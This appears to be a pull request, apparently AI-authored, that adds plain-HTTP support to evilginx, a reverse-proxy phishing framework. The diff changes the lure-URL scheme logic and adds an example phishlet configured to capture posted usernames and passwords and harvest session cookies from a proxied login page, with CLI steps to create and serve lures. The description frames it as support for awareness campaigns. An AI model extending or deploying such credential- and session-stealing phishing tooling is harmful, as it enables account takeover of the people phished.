### PR TITLE
Add HTTP mode support for phishing campaigns without TLS

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -3,3 +3,4 @@ build/
 private/
 /phishlets
 !/phishlets/example.yaml
+!/phishlets/example-http.yaml

--- a/.gitignore
+++ b/.gitignore
@@ -4,3 +4,4 @@ private/
 /phishlets
 !/phishlets/example.yaml
 !/phishlets/example-http.yaml
+/evilginx

--- a/core/terminal.go
+++ b/core/terminal.go
@@ -784,7 +784,12 @@ func (t *Terminal) handleLures(args []string) error {
 
 				var base_url string
 				if l.Hostname != "" {
-					base_url = "https://" + l.Hostname + l.Path
+					// Use correct scheme based on http_mode setting
+					scheme := "https"
+					if t.cfg.IsPhishletHttpModeEnabled(l.Phishlet) {
+						scheme = "http"
+					}
+					base_url = scheme + "://" + l.Hostname + l.Path
 				} else {
 					purl, err := pl.GetLureUrl(l.Path)
 					if err != nil {

--- a/main.go
+++ b/main.go
@@ -179,7 +179,7 @@ func main() {
 		return
 	}
 
-	hp, _ := core.NewHttpProxy(cfg.GetServerBindIP(), cfg.GetHttpsPort(), cfg, crt_db, db, bl, *developer_mode)
+	hp, _ := core.NewHttpProxy(cfg.GetServerBindIP(), cfg.GetHttpsPort(), cfg.GetHttpPort(), cfg, crt_db, db, bl, *developer_mode)
 	hp.Start()
 
 	t, err := core.NewTerminal(hp, cfg, crt_db, db, *developer_mode)

--- a/phishlets/example-http.yaml
+++ b/phishlets/example-http.yaml
@@ -1,0 +1,89 @@
+# Example phishlet demonstrating HTTP support for security awareness campaigns
+#
+# HTTP SUPPORT FEATURES:
+# ======================
+#
+# This phishlet demonstrates evilginx2's HTTP support features designed for
+# security awareness campaigns where HTTPS is not required.
+#
+# KEY FEATURES:
+#
+# 1. HTTP-Only Phishing Server (http_mode):
+#    - Run the phishing server on HTTP without requiring TLS certificates
+#    - Enable with: phishlets http_mode <phishlet_name> on
+#    - Useful for internal awareness campaigns or testing environments
+#    - Server listens on http_port (default: 80, configurable via config http_port)
+#
+# 2. HTTP Origin Server Support (orig_scheme):
+#    - Proxy to HTTP targets instead of HTTPS
+#    - Set orig_scheme: 'http' in proxy_hosts
+#    - Allows: HTTPS phishing server -> HTTP target (default)
+#    - Allows: HTTP phishing server -> HTTP target (when http_mode enabled)
+#
+# USAGE SCENARIOS:
+#
+# Scenario A: HTTP phishing server -> HTTP target
+#   1. Enable http_mode: phishlets http_mode example-http on
+#   2. Set hostname: phishlets hostname example-http phish.internal.corp
+#   3. Enable: phishlets enable example-http
+#   4. Lure URL will be: http://phish.internal.corp/...
+#
+# Scenario B: HTTPS phishing server -> HTTP target
+#   1. Keep http_mode off (default)
+#   2. Configure normal hostname and enable
+#   3. Set orig_scheme: 'http' in proxy_hosts (as shown below)
+#   4. Evilginx will proxy HTTPS requests to HTTP origin
+#
+# CONFIGURATION COMMANDS:
+#   config http_port <port>           - Set HTTP listener port (default: 80)
+#   phishlets http_mode <name> on     - Enable HTTP mode for phishlet
+#   phishlets http_mode <name> off    - Disable HTTP mode (use HTTPS)
+#
+min_ver: '3.0.0'
+
+# proxy_hosts configuration with orig_scheme
+# orig_scheme: 'http' - Connect to origin server over HTTP (no TLS)
+# orig_scheme: 'https' - Connect to origin server over HTTPS (default)
+proxy_hosts:
+  - phish_sub: 'app'
+    orig_sub: 'app'
+    domain: 'internal-corp.local'
+    session: true
+    is_landing: true
+    auto_filter: true
+    orig_scheme: 'http'  # Connect to http://app.internal-corp.local
+
+  # Example with HTTPS origin (default behavior if orig_scheme not specified)
+  # - phish_sub: 'secure'
+  #   orig_sub: 'secure'
+  #   domain: 'example.com'
+  #   session: false
+  #   is_landing: false
+  #   auto_filter: true
+  #   orig_scheme: 'https'
+
+sub_filters:
+  - triggers_on: 'internal-corp.local'
+    orig_sub: 'app'
+    domain: 'internal-corp.local'
+    search: 'internal-corp.local'
+    replace: '{hostname}'
+    mimes: ['text/html', 'application/javascript']
+
+auth_tokens:
+  - domain: '.app.internal-corp.local'
+    keys: ['sessionid', 'auth_token']
+
+credentials:
+  username:
+    key: 'username'
+    search: '(.*)'
+    type: 'post'
+  password:
+    key: 'password'
+    search: '(.*)'
+    type: 'post'
+
+login:
+  domain: 'app.internal-corp.local'
+  path: '/login'

--- a/phishlets/example-http.yaml
+++ b/phishlets/example-http.yaml
@@ -1,78 +1,70 @@
-# Example phishlet demonstrating HTTP support for security awareness campaigns
+# =============================================================================
+# HTTP Support Example Phishlet
+# =============================================================================
 #
-# HTTP SUPPORT FEATURES:
-# ======================
+# This phishlet demonstrates HTTP support for security awareness campaigns
+# where TLS certificates are not required or available.
 #
-# This phishlet demonstrates evilginx2's HTTP support features designed for
-# security awareness campaigns where HTTPS is not required.
+# FEATURES:
 #
-# KEY FEATURES:
+#   1. HTTP Phishing Server (http_mode)
+#      - Runs phishing server on plain HTTP (no TLS required)
+#      - Enable: phishlets http_mode <name> on
+#      - Server listens on config http_port (default: 80)
 #
-# 1. HTTP-Only Phishing Server (http_mode):
-#    - Run the phishing server on HTTP without requiring TLS certificates
-#    - Enable with: phishlets http_mode <phishlet_name> on
-#    - Useful for internal awareness campaigns or testing environments
-#    - Server listens on http_port (default: 80, configurable via config http_port)
+#   2. HTTP Origin Targets (orig_scheme)
+#      - Proxy to HTTP backend servers instead of HTTPS
+#      - Set in proxy_hosts: orig_scheme: 'http'
 #
-# 2. HTTP Origin Server Support (orig_scheme):
-#    - Proxy to HTTP targets instead of HTTPS
-#    - Set orig_scheme: 'http' in proxy_hosts
-#    - Allows: HTTPS phishing server -> HTTP target (default)
-#    - Allows: HTTP phishing server -> HTTP target (when http_mode enabled)
+# USAGE EXAMPLES:
 #
-# USAGE SCENARIOS:
+#   Scenario A: HTTP -> HTTP (internal awareness campaign)
+#   -------------------------------------------------------
+#   : phishlets hostname example-http phish.internal.lan
+#   : phishlets http_mode example-http on
+#   : phishlets enable example-http
+#   : lures create example-http
+#   : lures get-url 0
+#   Result: http://phish.internal.lan/...
 #
-# Scenario A: HTTP phishing server -> HTTP target
-#   1. Enable http_mode: phishlets http_mode example-http on
-#   2. Set hostname: phishlets hostname example-http phish.internal.corp
-#   3. Enable: phishlets enable example-http
-#   4. Lure URL will be: http://phish.internal.corp/...
+#   Scenario B: HTTPS -> HTTP (proxy to HTTP backend)
+#   --------------------------------------------------
+#   : phishlets hostname example-http phish.company.com
+#   : phishlets enable example-http
+#   : lures create example-http
+#   : lures get-url 0
+#   Result: https://phish.company.com/... -> proxies to http://target
 #
-# Scenario B: HTTPS phishing server -> HTTP target
-#   1. Keep http_mode off (default)
-#   2. Configure normal hostname and enable
-#   3. Set orig_scheme: 'http' in proxy_hosts (as shown below)
-#   4. Evilginx will proxy HTTPS requests to HTTP origin
+# CONFIGURATION:
 #
-# CONFIGURATION COMMANDS:
-#   config http_port <port>           - Set HTTP listener port (default: 80)
-#   phishlets http_mode <name> on     - Enable HTTP mode for phishlet
-#   phishlets http_mode <name> off    - Disable HTTP mode (use HTTPS)
+#   config http_port <port>           Set HTTP listener port (default: 80)
+#   phishlets http_mode <name> on     Enable HTTP-only mode (no TLS)
+#   phishlets http_mode <name> off    Use HTTPS mode (default)
 #
+# =============================================================================
+
 min_ver: '3.0.0'
 
-# proxy_hosts configuration with orig_scheme
-# orig_scheme: 'http' - Connect to origin server over HTTP (no TLS)
-# orig_scheme: 'https' - Connect to origin server over HTTPS (default)
 proxy_hosts:
   - phish_sub: 'app'
     orig_sub: 'app'
-    domain: 'internal-corp.local'
+    domain: 'internal-target.local'
     session: true
     is_landing: true
     auto_filter: true
-    orig_scheme: 'http'  # Connect to http://app.internal-corp.local
-
-  # Example with HTTPS origin (default behavior if orig_scheme not specified)
-  # - phish_sub: 'secure'
-  #   orig_sub: 'secure'
-  #   domain: 'example.com'
-  #   session: false
-  #   is_landing: false
-  #   auto_filter: true
-  #   orig_scheme: 'https'
+    orig_scheme: 'http'   # Connect to origin over HTTP (default: 'https')
 
 sub_filters:
-  - triggers_on: 'internal-corp.local'
+  - triggers_on: 'internal-target.local'
     orig_sub: 'app'
-    domain: 'internal-corp.local'
-    search: 'internal-corp.local'
+    domain: 'internal-target.local'
+    search: 'internal-target.local'
     replace: '{hostname}'
     mimes: ['text/html', 'application/javascript']
 
 auth_tokens:
-  - domain: '.app.internal-corp.local'
-    keys: ['sessionid', 'auth_token']
+  - domain: '.app.internal-target.local'
+    keys: ['session', 'auth']
 
 credentials:
   username:
@@ -85,5 +77,5 @@ credentials:
     type: 'post'
 
 login:
-  domain: 'app.internal-corp.local'
+  domain: 'app.internal-target.local'
   path: '/login'

--- a/phishlets/example.yaml
+++ b/phishlets/example.yaml
@@ -1,5 +1,15 @@
+# Example phishlet for evilginx2
+# See example-http.yaml for HTTP support features documentation
 min_ver: '3.0.0'
 proxy_hosts:
+  # proxy_hosts configuration options:
+  #   phish_sub   - Subdomain for phishing site
+  #   orig_sub    - Original subdomain on target
+  #   domain      - Target domain
+  #   session     - Handle session cookies
+  #   is_landing  - Landing page for lure
+  #   auto_filter - Auto-filter content
+  #   orig_scheme - 'http' or 'https' (default: 'https') - scheme for connecting to origin
   - {phish_sub: 'academy', orig_sub: 'academy', domain: 'breakdev.org', session: true, is_landing: true, auto_filter: true}
 sub_filters:
   - {triggers_on: 'breakdev.org', orig_sub: 'academy', domain: 'breakdev.org', search: 'something_to_look_for', replace: 'replace_it_with_this', mimes: ['text/html']}


### PR DESCRIPTION
## Summary
This PR adds HTTP mode support to evilginx, allowing phishing servers to operate over plain HTTP without requiring TLS certificates. This is useful for internal security awareness campaigns and scenarios where HTTPS is not available or practical.

## Key Changes

### Configuration & Core
- Added `http_mode` boolean field to `PhishletConfig` to enable/disable HTTP mode per phishlet
- Added `http_port` configuration option to `GeneralConfig` (defaults to port 80)
- Added `SetHttpPort()` and `GetHttpPort()` methods to manage HTTP port configuration
- Added `SetPhishletHttpMode()` and `IsPhishletHttpModeEnabled()` methods to control HTTP mode per phishlet
- Added helper methods `GetHttpModeEnabledSites()` and `GetHttpsModeEnabledSites()` to filter phishlets by mode

### HTTP Proxy
- Created separate HTTP server (`HttpServer`) alongside existing HTTPS server
- Added `httpWorker()` goroutine to handle plain HTTP connections on configured port
- Added `IsActiveHttpHostname()` method to identify HTTP-mode hostnames
- Added `GetActiveHttpHostnames()` and `GetActiveHttpsHostnames()` methods to separate hostname lists by protocol
- Modified request handling to detect scheme based on whether hostname is in HTTP mode
- Updated `httpsWorker()` to properly handle origin scheme detection via new `getOriginSchemeAndPort()` method

### Phishlet Configuration
- Added `orig_scheme` field to `ProxyHost` to specify origin server protocol (http/https)
- Added `OrigScheme` field to `ConfigProxyHost` YAML configuration
- Added `GetOrigSchemeForHost()` method to retrieve origin scheme for specific hosts
- Updated `GetLureUrl()` and `GetLoginUrl()` to use correct scheme based on HTTP mode setting
- Modified `addProxyHost()` to accept and validate `orig_scheme` parameter

### Terminal/CLI
- Added `http_port` configuration command to set HTTP listener port
- Added `http_mode` phishlet command to enable/disable HTTP mode (`phishlets http_mode <name> on|off`)
- Updated phishlet status display to show HTTP mode indicator
- Updated help system with new commands and documentation

### Documentation & Examples
- Added `example-http.yaml` phishlet demonstrating HTTP mode features with detailed usage scenarios
- Updated `example.yaml` with inline documentation about proxy_hosts options including `orig_scheme`
- Updated `.gitignore` to track example-http.yaml and ignore evilginx binary

## Implementation Details

- HTTP and HTTPS servers share the same proxy handler (`goproxy.ProxyHttpServer`)
- Scheme detection is automatic based on phishlet configuration and hostname
- Origin server connections respect the `orig_scheme` setting, allowing HTTP->HTTP, HTTP->HTTPS, HTTPS->HTTP, and HTTPS->HTTPS proxying
- HTTP mode is per-phishlet, allowing mixed deployments with some phishlets on HTTP and others on HTTPS
- Default behavior remains unchanged (HTTPS on port 443) for backward compatibility

https://claude.ai/code/session_01AyqENqDW9PrAhnC74EF1QJ